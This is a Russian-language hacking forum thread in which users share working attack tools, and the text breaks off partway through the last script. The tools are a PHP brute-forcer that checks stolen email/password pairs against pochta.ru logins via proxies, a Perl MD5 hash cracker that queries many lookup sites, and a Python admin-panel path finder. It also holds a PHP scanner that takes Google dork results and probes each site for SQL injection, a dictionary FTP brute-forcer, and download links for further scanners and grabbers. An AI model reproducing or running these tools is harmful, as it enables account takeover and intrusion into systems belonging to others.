Простой скрипт брутер pochta.ru. Использует очень полезный класс для работы с сокетами. Сам брутер: PHP: <?php /* Pochta.ru брутер. login.txt - файл формата e-mail;password proxy.txt - файл с проксями. good.txt - сбрученные аккаунты. (с) art2222 */ require_once 'class.php'; $cs = new phpsploit(); $cs -> agent('Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)'); $proxy = @file('proxy.txt'); $good = array(); foreach (file('login.txt') as $value) { list($login,$pass) = explode(';',trim($value)); list($login,$domain) = explode('@',$login); list($ip,$port) = explode(':',trim(array_rand($proxy))); $cs->proxy($ip,$port); $content = $cs->post('http://pda.pochta.ru/auth/logon',"reason=login&lng=ru&rnd=&user=$login&domain=$domain&pass=$pass"); if (strpos($content,'INBOX')) array_push($good, $value); } file_put_contents('good.txt', $good); ?> Брутер+php класс
MD5-Crack-Monster(перл) Code: #!usr/bin/perl ## # Coded By hors_de_prix # Md5 Crack Monster v1.1 ####################### # www.tydal.nu # milw0rm.com # gdataonline.com # ice.breaker.free.fr # passcracking.com # md5.hashcracking.com # md5decryption.com # www.hashchecker.com # victorov.su # md5crack.it-helpnet.de # www.md5decrypter.com # blacklight.gotdns.org # www.hashchecker.com # md5.ip-domain.com.cn # www.bigtrapeze.com # opencrack.hashkiller.com # md5live.com # www.md5hood.com # www.astalavista.net ####################### # Ex. Option 1 # # Pick one of ~# 1 # Enter Md5 Hash ~# 9f06cd848dfef4e02ff9a14a21ae5dd8 # *************** # Ex. Option 2 # # Pick one of ~# 2 # Enter Md5 File ~# md5_hash.txt # *************** # # Ex. For md5_hash.txt # # 28c15e68173b7bf815ccbfd0513d2663 # 21232f297a57a5a743894a0e4a801fc3 # 8ff32489f92f33416694be8fdc2d4c22 # ... # ... ## use LWP::UserAgent; use HTTP::Request::Common; system('cls'); system('title Md5 Crack Monster v1.1 - Coded By KuNdUz'); print "\n\t***********************************\n"; print "\t* Md5 Crack Monster v1.1 *\n"; print "\t* Coded By KuNdUz *\n"; print "\t- Options: -\n"; print "\t* 1 - md5 hash *\n"; print "\t* 2 - md5.txt *\n"; print "\t***********************************\n"; print "\nPick One Of ~# "; $pick=<STDIN>; chop($pick); if($pick == "1"){ MD5FAIL: print "\nEnter Md5 Hash ~# "; $hash=<STDIN>; chop($hash); ###############md5 hash crack############### if (length($hash)==32) { print "\n\t*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*\n"; print "\t* Md5 Crack Monster v1.1 *\n"; print "\t* Coded By KuNdUz *\n"; print "\t*__ $hash Searching 19 sites __*\n"; print "\t*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*-*\n\n"; &next; } else { print "\nThis is not a md5 hash!\n\n$hash \n\nTry Again! \n\n"; goto MD5FAIL; } } ###############md5 hash file crack############### if($pick == "2"){ print "\nEnter Md5 File ~# "; $file=<STDIN>; chop($file); open(RES,"<","$file"); @lol = <RES>; close(RES); foreach $hash(@lol){ print " \nSearching Md5 Hash $hash\n\n"; &next; } } sub next { $url = "http://www.tydal.nu/php/sakerhet/md5.php? q=$hash"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp -> get($url); print "1 www.tydal.nu ---- "; if ($connect -> content =~ /(.*)<\/b><\/h5>/) { if ($connect -> content =~ /Ingen/) { print "Result : Hash not found!\n"; } else { print "Result : $1\n"; } } else { print "Result : Hash not found!\n"; } $url = "http://milw0rm.com/cracker/search.php"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["hash" => $hash, "Submit" => "Submit"]); print "2 www.milw0rm.com ---- "; if ($request->content =~ /<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>(.*)<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked<\/TD><\/TR>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://gdataonline.com/qkhash.php? mode=txt&hash=$hash"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp -> get($url); print "3 gdataonline.com ---- "; if ($connect -> content =~ /<\/td><td width=\"35%\"><b> (.*)<\/b><\/td><\/tr>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://ice.breaker.free.fr/md5.php?hash=$hash"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp->get($url); print "4 ice.breaker.free.fr ---- "; if ($connect -> content =~ /: <b><br><br> - (.*) <br><br><br><a href=http:\/\/ice.breaker.free.fr\/#hash>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://passcracking.com/"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp ->post($url, ["datafromuser" => $hash, "submit" => "DoIT"]); print "5 passcracking.com ---- "; if ($request->content =~ /<\/td><td>md5 Database<\/td><td>$hash<\/td><td bgcolor=#FF0000>(.*) <\/td><td>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://md5.hashcracking.com/search.php? md5=$hash"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp -> get($url); print "6 md5.hashcracking.com ---- "; if ($connect->content =~ /Cleartext of $hash is (.*)/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://md5decryption.com"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]); print "7 www.md5decryption.com ---- "; if ($request->content =~ /<h2>Results<\/h2><b>Md5 Hash:<\/b> $hash<br\/><b class='red'>Normal Text: <\/b> (.*)<br\/>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://www.hashchecker.com/index.php? _sls=search_hash"; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp -> post($url, ["search_field" => $hash, "Submit" => "search"]); print "8 www.hashchecker.com ---- "; if ($request -> content =~ /<td><li>Your md5 hash is :<br><li>$hash is <b>(.*)<\/b> used charl/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://victorov.su/md5/?md5e=&md5d=$hash"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp -> get($url); print "9 victorov.su ---- "; if ($connect -> content =~ /MD5 расшифрован: <b>(.*) <\/b><br><form action=\"\">/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://md5crack.it-helpnet.de/index.php?op=search"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["md5" => $hash, "submit" => "Search now"]); print "10 md5crack.it-helpnet.de ---- "; if ($request->content =~ /<\/td><td>$hash<\/td><td>(.*) <\/td>/) { if (length($1)==23) { print "Result : Hash not found!\n"; } else { print "Result : $1\n"; } } else { print "Result : Hash not found!\n"; } $url = "http://www.md5decrypter.com/"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt!"]); print "11 www.md5decrypter.com ---- "; if ($request->content =~ /<h2>Results<\/h2><b>Md5 Hash:<\/b> $hash<br\/><b class='red'>Normal Text: <\/b> (.*)/) { if (length($1)==23) { print "Result : Hash not found!\n"; } else { print "Result : $1\n"; } } else { print "Result : Hash not found!\n"; } $url = "http://blacklight.gotdns.org/cracker/crack.php"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["hash" => $hash, "algos" => "MD5", "crack" => "Crack"]); print "12 blacklight.gotdns.org ---- "; if ($request->content =~ /$hash -> <b>(.*) <\/b><br><br>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://www.hashchecker.com/index.php? _sls=search_hash"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["search_field" => $hash, "Submit" => "search"]); print "13 www.hashchecker.com ---- "; if ($request->content =~ /<td><li>Your md5 hash is :<br><li>$hash is <b>(.*)<\/b> used charlist/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://md5.ip-domain.com.cn/"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["text" => $hash, "submit" => "submit"]); print "14 md5.ip-domain.com.cn ---- "; if ($request->content =~ /<strong>result:<\/strong><font color=red>(.+)<\/font> /){ print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://www.bigtrapeze.com/md5/"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["query" => $hash, "submit" => " Crack "]); print "15 www.bigtrapeze.com ---- "; if ($request->content =~ /The hash <strong>$hash<\/strong> has been deciphered to: <strong>(.+)<\/strong>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://opencrack.hashkiller.com/"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["oc_check_md5" => $hash, "submit" => "Search MD5"]); print "16 opencrack.hashkiller.com ---- "; if ($request->content =~ /<\/div><div class="result">$hash:(.+)<br\/>/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "http://md5live.com/index.php? format=md5&search=$hash"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $connect = $lwp -> get($url); print "17 md5live.com ---- "; if ($connect -> content =~ /(.+)<br \/>/){ print "Result : $1\n"; } $url = "http://www.md5hood.com/"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["md5" => $hash, "submit" => "Search"]); print "18 www.md5hood.com ---- "; if ($request->content =~ / <div class="result_found">(.+)<\/div>/){ print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } $url = "https://www.astalavista.net/?cmd=rainbowtables"; $lwp = LWP::UserAgent->new(); $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"); $request = $lwp->post($url, ["query_hash" => $hash, "submit" => "Search", "hash_algorithm_query" => "MD5"]); print "19 www.astalavista.net ---- "; if ($request->content =~ /<\/td><\/tr><tr><td><b>Plain- Text:<\/b><\/td><\/tr><tr><td>(.+)/) { print "Result : $1\n"; } else { print "Result : Hash not found!\n"; } } ## # Coded By hors_de_prix ##
Моя колекция скриптов silviasql сканер ссылка: http://rapidshare.com/files/232010053/silviasql.rar FTP_scanner_by_softxor ссылка: http://rapidshare.com/files/232014333/FTP_scanner_by_softxor.rar PHP_Injection_Scanner ссылка: http://rapidshare.com/files/232015154/PHP_Injection_Scanner.rar Грабер, чекер валидности и анонимности проксей ссылка: http://rapidshare.com/files/232015698/__1043___1088___1072___1073___1077___1088_____1095___1077___1082___1077___1088____1074___1072___1083 DNS_Scanner ссылка: http://rapidshare.com/files/232016134/DNS_Scanner.rar Googler_v1.69 ссылка: http://rapidshare.com/files/232017000/Googler_v1.69.rar Email_grabber ссылка: http://rapidshare.com/files/232018037/Email_grabber.rar MD5cracker_Bot ссылка: http://rapidshare.com/files/232017517/MD5cracker_Bot.rar
у меня есть, только на питоне: Code: #/usr/bin/python import sys, os, time, httplib if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) != 2: print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Help: admin-find.py -h |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-----------------------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Usage: admin-find.py www.site.com |" print "| Example: admin-find.py site.com |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) site = sys.argv[1].replace("http://","").rsplit("/",1)[0] site = site.lower() admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php', 'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php ','memberadmin.php','administratorlogin.php'] print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") print "[+] Target:",site print "[+] Checking paths..." print try: for admin in admin_path: admin = admin.replace("\n","") admin = "/" + admin connection = httplib.HTTPConnection(site) connection.request("GET",admin) response = connection.getresponse() print "%s %s %s" % (admin, response.status, response.reason) except(KeyboardInterrupt,SystemExit): raise except: pass
Скрипт для скуллеров Берёте в гугле вводите запрос например:inurl:index.php?id=, копируете урлу и вставляете в скрипт и он начинает подставлять к каждому урлу +order+by+1000(можете поменять),и потом выводит ошибки... PHP: <?php if(!function_exists("curl_init")) exit("CURL REQUIRED"); ?> <form id="form1" name="form1" method="post" action="<?=$PHP_SELF?>"> <table width="500" border="0" cellspacing="2" cellpadding="2"> <tr> <td><label>query: <input name="query" type="text" id="query" size="100" valuse="<?=$_POST[query]?>"/> <br /> <br /> <font size="2">ex:<strong> http://www.google.com/search?hl=en&q=inurl%3A%22article.php%3Fid%3D%22&btnG=Google+Search</strong></font></label></td> </tr> <tr> <td><label> <input type="submit" name="button" id="button" value="Submit" /> </label></td> </tr> </table> </form> <?php if (!empty($_POST[query]) ){ @set_time_limit(0); @error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); $fetch = fetch(trim($_POST[query])."&num=100" ); if ( strpos($fetch, "We're sorry...") !== false ) { print "GOOGLE ERROR"; exit ;} //if(!preg_match_all("/cite\>([^\>]*>article\.php\?id[^\=]*=\d*)/i", $fetch, $mtc)) { print "GOOGLE2 ERROR"; exit ;} if( !preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $fetch, $matches)) { print "GOOGLE2 ERROR"; exit ;} foreach (array_unique($matches[0]) as $u) { if ( strpos($u, "cache") !== false ) { continue ;} if ( strpos($u, "google") !== false ) { continue ;} if ( strpos($u, "download.com") !== false ) { continue ;} if ( strpos($u, "youtube.com") !== false ) { continue ;} if ( strpos($u, "javascript:void") !== false ) { continue ;} $u = str_replace("a href=","",$u); $u = str_replace("\"","",$u); $url = str_replace("http://","",$u); $offset =0; $time = 0; while(preg_match("/\=\d{1,}/", $url, $m, PREG_OFFSET_CAPTURE,$offset) ) { if($time>3) break; $offset = $m[0][1]+strlen( $m[0][0]); $time++; $_url = substr_replace ( $url , "+order+by+1000--", $offset , 0); if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags( html_entity_decode( fetch($_url)) ) , $ws)) { print "<strong><font color=red>Походу ***** ему :): $_url</font></strong><font color=blue>".implode(",", $ws[0])."</font><br>"; break; } else { echo $_url."<br>"; flush(); ob_flush(); } } if(!$time) { $url = $url."+order+by+1000--"; if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags( html_entity_decode( fetch($url)) ) , $ws)) { print "<strong><font color=red>Походу ***** ему :): $url</font></strong><font color=blue>".implode(",", $ws[0])."</font><br>"; } else { echo $url."<br>"; flush(); ob_flush(); } } } } function fetch($url) { if(file_exists('stopfile')) exit; $header[] = "Accept-Language: en"; $header[] = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; $header[] = "Connection: Keep-Alive"; $header[] = "Pragma: no-cache"; $header[] = "Cache-Control: no-cache"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); if(!curl_setopt($ch, CURLOPT_TIMEOUT, 5)) {echo 'CURLOPT TIMEOUT Error';} curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt'); //curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt'); $page = curl_exec($ch); curl_close($ch); //echo $page."<HR>"; return $page; } ?> Чё то у меня не получается нормально код запостить вот ссылка: http://slil.ru/27659432
Sosok: PHP: PHP: <?php if(!function_exists("curl_init")) exit("CURL REQUIRED"); ?> <form id="form1" name="form1" method="post" action="<?=$PHP_SELF?>"> <table width="500" border="0" cellspacing="2" cellpadding="2"> <tr> <td><label>query: <input name="query" type="text" id="query" size="100" valuse="<?=$_POST[query]?>"/> <br /> <br /> <font size="2">ex:<strong> http://www.google.com/search?hl=en&q=inurl%3A%22article.php%3Fid%3D%22&btnG=Google+Search</strong></font></label></td> </tr> <tr> <td><label> <input type="submit" name="button" id="button" value="Submit" /> </label></td> </tr> </table> </form> <?php if (!empty($_POST[query]) ){ @set_time_limit(0); @error_reporting(0); @ignore_user_abort(true); ini_set('memory_limit', '128M'); $fetch = fetch(trim($_POST[query])."&num=100" ); if ( strpos($fetch, "We're sorry...") !== false ) { print "GOOGLE ERROR"; exit ;} //if(!preg_match_all("/cite\>([^\>]*>article\.php\?id[^\=]*=\d*)/i", $fetch, $mtc)) { print "GOOGLE2 ERROR"; exit ;} if( !preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $fetch, $matches)) { print "GOOGLE2 ERROR"; exit ;} foreach (array_unique($matches[0]) as $u) { if ( strpos($u, "cache") !== false ) { continue ;} if ( strpos($u, "google") !== false ) { continue ;} if ( strpos($u, "download.com") !== false ) { continue ;} if ( strpos($u, "youtube.com") !== false ) { continue ;} if ( strpos($u, "javascript:void") !== false ) { continue ;} $u = str_replace("a href=","",$u); $u = str_replace("\"","",$u); $url = str_replace("http://","",$u); $offset =0; $time = 0; while(preg_match("/\=\d{1,}/", $url, $m, PREG_OFFSET_CAPTURE,$offset) ) { if($time>3) break; $offset = $m[0][1]+strlen( $m[0][0]); $time++; $_url = substr_replace ( $url , "+order+by+1000--", $offset , 0); if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags( html_entity_decode( fetch($_url)) ) , $ws)) { print "<strong><font color=red>Походу ***** ему :): $_url</font></strong><font color=blue>".implode(",", $ws[0])."</font><br>"; break; } else { echo $_url."<br>"; flush(); ob_flush(); } } if(!$time) { $url = $url."+order+by+1000--"; if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags( html_entity_decode( fetch($url)) ) , $ws)) { print "<strong><font color=red>Походу ***** ему :): $url</font></strong><font color=blue>".implode(",", $ws[0])."</font><br>"; } else { echo $url."<br>"; flush(); ob_flush(); } } } } function fetch($url) { if(file_exists('stopfile')) exit; $header[] = "Accept-Language: en"; $header[] = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; $header[] = "Connection: Keep-Alive"; $header[] = "Pragma: no-cache"; $header[] = "Cache-Control: no-cache"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE ); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); if(!curl_setopt($ch, CURLOPT_TIMEOUT, 5)) {echo 'CURLOPT TIMEOUT Error';} curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt'); //curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt'); $page = curl_exec($ch); curl_close($ch); //echo $page."<HR>"; return $page; } ?>
FTP-BRUTE фтп-брут по словарям, работает в различных режимах: 1 - брут по двум словарям - логинов и паролей (отдельно словарь логинов, отдельно словарь паролей) - неизвестны ни логин, ни пароль 2 - брут по словарю паролей, известен только логин 3 - брут по словарю логинов, известен только пароль 4 - брут по словарю логин/пароль (разделитель любой, кроме ";" и пробела, например root:root, каждая пара с новой строки) - неизвестны ни логин, ни пароль все настройки задаются в файле ftp.ini: Code: mode = 3 ;0 - брут по двум словарям - логинов и паролей (отдельно словарь логинов, отдельно словарь паролей) - неизвестны ни логин, ни пароль ;1 - брут по словарю паролей, логин нужно внести ниже (известен только логин) ;2 - брут по словарю логинов, пароль нужно внести ниже (известен только пароль) ;3 - брут по словарю логин/пароль (разделитель любой, кроме ";" и пробела, например root:root, каждая пара с новой строки) - неизвестны ни логин, ни пароль host = ;фтп-хост port = 21 ;фтп-порт login = ;логин (если брут паролей по одному логину) pass = ;пароль (если брут логинов по одному паролю) file_pass = passw.txt ;файл-словарь паролей для брута (каждый пароль с новой строки) file_login = login.txt ;файл-словарь логинов (каждый логин с новой строки) file_login_pass = log_pass.txt ;файл-словарь логинов/паролей (каждая связка логин/пароль с новой строки) file_login_pass_del = : ;разделитель между логин/пароль в файле file_login_pass, не может быть ";" или пробелом file_result = ftp_result.txt ;файл для сохранения результатов pause = 0 ;пауза между попытками в секундах (если нужно) timeout = 100 ;таймаут на установление фтп-соединения (обязательный параметр) kol = 1 ;через какое кол-во попыток выводить инфо на экран запускается файлом ftpbr.exe (или RUN!!!.cmd) под WIN и файл ftpbr.php под никсами. Скачать всё в одном архиве, пароль - 123 Из особенностей - абсолютно не требователен к оперативной памяти, независимо от размера словарей PHP: <?php @set_time_limit(0); @ini_set("display_errors","0"); ignore_user_abort(1); echo "\n [[[ FTP-BRUTE 1.0 by Pashkela (c)2009 ]]]"; $ini = parse_ini_file("ftp.ini") or die("ftp.ini not found"); $mode = $ini[mode]; // 0 - брут по двум словарям - логин/пассворд, 1 - брут по словарю паролей, логин нужно внести ниже, 2 - брут по словарю логинов, пароль нужно внести ниже, 3 - брут по словарю логин/пароль (разделитель любой, кроме ";", например root:root, каждая пара с новой строки) - неизвестны ни логин, ни пароль $host = $ini[host]; // фтп-хост $port = $ini[port]; // фтп-пароль $login = $ini[login]; // логин (если брут паролей по одному логину) $pass = $ini[pass]; // пароль (если брут логинов по одному паролю) $file_pass = $ini[file_pass]; // файл-словарь паролей $file_login = $ini[file_login]; // файл-словарь логинов $file_result = $ini[file_result]; // файл для сохранения результатов $file_login_pass = $ini[file_login_pass];// файл-словарь логинов/паролей (каждая связка логин/пароль с новой строки) $file_login_pass_del = $ini[file_login_pass_del];//разделитель между логин/пароль в файле file_login_pass, не может быть ";" или пробелом $pause = $ini[pause]; // пауза между попытками, если надо $timeout = $ini[timeout]; // таймаут на установление фтп-соединения $kol = $ini[kol]; // через какое кол-во попыток выводить инфо на экран $handle1 = fopen($file_result, "a"); $i = 0; $s = 0; // Брут по двум словарям (не знаем ни логина ни пароля): if ($mode==0) { $login = ''; $pass = ''; // Brute echo "\n\n Count logins & passwords, wait please..."; $handle2 = fopen($file_login, "r"); $handle = fopen($file_pass, "r"); while ($buffer = fgets($handle2)) $p++; fclose($handle2); echo "\n\n\n$p logins...working\n"; while ($buffer = fgets($handle)) $g++; fclose($handle); echo "$g passwords...working\n"; echo "Will brute login|password\n"; echo "at host: <$host> \n"; echo "at port: <$port>\n"; echo "brute info after every <$kol> connections\n"; echo "pause between connections: <$pause> seconds\n"; echo "Working, wait please...\n\n"; $handle2 = fopen($file_login, "r"); while (!feof($handle2)) { $login = trim(fgets($handle2)); echo "\n will brute password for login <$login> ..."; $handle = fopen($file_pass, "r"); while (!feof($handle)) { $pass = trim(fgets($handle)); $open = ftp_connect($host,$port,"100"); // сервер, порт, таймаут if(!ftp_login($open,$login,$pass)) { $i++; if ($i==$kol) { $s = $s+$i; $i=0; $w = $g - $s; echo "\nPass $s connections, remain $w passwords, brute..."; sleep($pause); } } else { echo "\n\n\nSuccess connection!!!! Done."; echo "\n <<<Login: $login | Password : $pass>>>"; ftp_close($open); // закрываем фтп-соединение fwrite($handle1,"Хост: $host, порт: $port, логин: $login, пароль: $pass". "\r\n"); fclose($handle1); fclose($handle); echo "\n\n\n [[[ All results was saved in <$file_result> ]]]"; exit; } } fclose($handle); $i = 0; $s = 0; } echo "\n\n\n [[[ Sorry, not found ]]]"; fclose($handle1); fclose($handle2); } // Брут по словарю паролей(знаем логин): if ($mode==1) { echo "\n\n Count passwords, wait please..."; $handle = fopen($file_pass, "r"); while ($buffer = fgets($handle)) $p++; fclose($handle); echo "\n\n\n$p passwords...working\n\n"; echo "Will brute login: <$login>\n"; echo "at host: <$host> \n"; echo "at port: <$port>\n"; echo "brute info after every <$kol> connections\n"; echo "pause between connections: <$pause> seconds\n"; echo "Working, wait please...\n\n"; $pass = ''; // Brute $handle = fopen($file_pass, "r"); while (!feof($handle)) { $pass = trim(fgets($handle)); $open = ftp_connect($host,$port,"100"); // сервер, порт, таймаут if(!ftp_login($open,$login,$pass)) { $i++; if ($i==$kol) { $s = $s+$i; $i=0; $w = $p - $s; echo "Pass $s connections, remain $w passwords, brute...\n"; sleep($pause); } } else { echo "\n\n\nSuccess connection!!!! Done."; echo "\n <<<Password : $pass>>>"; ftp_close($open); // закрываем фтп-соединение fwrite($handle1,"Хост: $host, порт: $port, логин: $login, пароль: $pass". "\r\n"); fclose($handle1); fclose($handle); echo "\n\n\n [[[ All results was saved in <$file_result> ]]]"; exit; } } echo "\n\n\n [[[ Sorry, not found ]]]"; fclose($handle); fclose($handle1); } // Брут по словарю логинов(знаем пароль): if ($mode==2) { echo "\n\n Count logins, wait please..."; $handle = fopen($file_login, "r"); while ($buffer = fgets($handle)) $p++; fclose($handle); echo "\n\n\n$p logins...working\n\n"; echo "Will brute pass: <$pass>\n"; echo "at host: <$host> \n"; echo "at port: 